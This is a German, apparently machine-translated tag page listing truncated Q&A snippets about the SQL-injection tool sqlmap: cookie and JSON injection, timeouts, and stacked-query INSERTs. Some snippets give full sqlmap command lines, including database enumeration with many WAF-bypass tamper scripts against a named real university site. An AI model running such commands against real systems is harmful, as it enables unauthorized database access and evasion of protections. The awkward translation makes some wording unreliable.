Tag: sqlmap

sqlmap ist ein „Automatisches SQL-injection-und Datenbank-übernahme-tool“. Es kann verwendet werden, um zu erkennen, Mängel in der software mit einer zugrunde liegenden SQL-Datenbank

SQLMAP - Post JSON-Daten als Körper

Anzahl der Antworten 1 Antworten
Hallo, ich versuche eine SQL-injection in ein login-Formular. Mit BurpSuite ich die Anforderung abfangen können: POST /xxxx/web/Login HTTP/1.1 Host: 10.0.0.70:42020 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: application/json, text/plain, */* Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3

Wie zu injizieren, ein Teil von cookie mit sqlmap

Anzahl der Antworten 2 Antworten
Muss ich tun SQL Injektion auf einen Teil der cookie-Verwendung sqlmap. Das Ziel URL ist statisch. Ein Probe-cookie: Cookie1=blah_var1/blah_val1/blah_var2/blah_val2/searchtext/userinput/blah_var3/blah_val3/.../ In diesem cookie ich brauche, um zu injizieren, die "userinput" mit sqlmap. Ich weiß --cookie-parameter, aber es wird

SQLMAP - how zum einfügen in eine Datenbank, wenn gestapelt Abfragen sind nicht möglich auf einem MYSQL-server?

Anzahl der Antworten 1 Antworten
Ziehen Datenbank-Tabellen und Spalten funktioniert gut mit SQLMAP, aber als ich versuchen, eine INSERT-Anweisung auszuführen, bekomme ich folgenden Fehler: Abfrage: sqlmap -u "http://www.example.com/details.php?item_id=327" -D main_db -T orders --columns --sql-query \ "INSERT INTO orders (order) VALUES ('test')" Table:orders

Immer "connection time out" - Fehler jedes mal auf die gleiche Stufe in sqlmap

Anzahl der Antworten 2 Antworten
Läuft auf sqlmap, ich bekomme immer einen Fehler auf der folgenden Schritt-und dann Verbindung wird wegen Zeitüberschreitung abgebrochen. [11:44:14] [INFO] Test 'UND Boole-basierenden blind - WHERE-oder HAVING-Klausel' [11:46:15] [KRITISCHEN] Zeitüberschreitung der Verbindung zu der Ziel-url oder proxy,

Sqlmap parameter "möglicherweise nicht injizierbare"

Anzahl der Antworten 1 Antworten
Im beginnend mit sqlmap und ich habe folgende Zweifel: Wenn ich versuche, mit sqlmap (versucht zu umgehen waf) mit diesem snippet: sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords oder dieses: sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs

sqlmap ist zu langsam

Anzahl der Antworten 4 Antworten
Hier ist ein Beispiel. Nur versuchen, um eine Liste der Datenbanken: python sqlmap.py -u "http://somesite.com/?id=1" --dbs [15:20:32] [INFO] fetching database names [15:20:32] [INFO] fetching number of databases [15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a

Parameter angeben, die mit SQLMAP

Anzahl der Antworten 5 Antworten
Ich bin ein student learning php & mysql-Entwicklung. ich habe setup ein eigenes Labor ( VM ) in meinem Rechner testen & erfahren Sie, wie sql-injection funktioniert. Wenn die Dinge schwieriger benutze ich sqlmap zu nutzen und